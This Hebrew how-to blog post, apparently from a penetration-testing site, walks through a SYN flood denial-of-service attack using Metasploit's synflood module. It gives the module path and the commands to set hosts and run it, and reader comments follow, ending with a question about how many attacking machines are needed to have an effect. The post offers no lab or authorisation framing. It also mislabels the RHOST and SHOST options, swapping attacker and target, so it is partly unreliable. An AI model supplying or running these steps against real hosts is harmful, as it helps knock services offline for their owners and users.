14.1K
ביצוע התקפת DOS פשוטה
מדריך זה הוא המשך למאמר התקפת מניעת שירות DOS ו DDOS וההבדל בניהם
הצפת SYN היא התקפה פשוטה מסוג DOS פירוש של Denial of service ובעברית התקפת מניעת שירות,
אנו נשלח רצף חבילות של בקשת SYN כך המחשב יפתח חיבורים עד שלא יישאר לו חיבורים פתוחים
ההתקפה היא פשוטה כיוון שאינה כוללת “בוטים” ואופן פגיעתה היא מזערית אך אני רוצה שתבינו את הרעיון ואך זה נראה במציאות.
נפתח את ה Terminal ונרשום metasploit
לאחר מכן נרשום use auxiliary /dos/tcp/synflood
SYN
נגדיר את הIP התוקף
set RHOST 192.168.1.103
את היעד
set SHOST 10.0.0.50
SYN
נרשום run ונוכל לראות שהמתקפה פעילה
SYN
לחצו ctrl + c לביטול
5 comments
היי, כשניסיתי לבצע את התקפת הDOS הTerminal לא זיהה לי את הפקודות. מדוע? האם צריך להוריד משהו מיוחד? כמובן משתמש בUbuntu
כמובן אין לך metasploit מותקן, על מנת לבצע את המדריכים באתר עדיף שתתקין הפצת Penetration
https://shushan.co.il/%D7%9E%D7%94%D7%9D-%D7%94%D7%A4%D7%A6%D7%95%D7%AA-penetration-testing-%D7%95%D7%9E%D7%94-%D7%94%D7%94%D7%91%D7%93%D7%9C%D7%99%D7%9D-%D7%91%D7%A0%D7%99%D7%94%D7%9D
אוקיי, ולאחר ביצוע הפקודות, מה אני בעצם אמור לראות במחשב? מה אמור לקרות בעקבות הDOS?
כאשר אתה היחיד שמבצע התקפת DOS לא תיהיה כמעט השפעה או בכלל, אבל אם כמות גדולה של מחשבים מבצעת זו בו זמנית, זה יצור עומס על השרת עד כדי מצב שהוא אינו יכול להגיב והשירותים בו עלולים לקרוס…
וכמה מחשבים תוקפים צריך בשביל שההתקפה תשפיע?
לכמה זמן היא מחזיקה?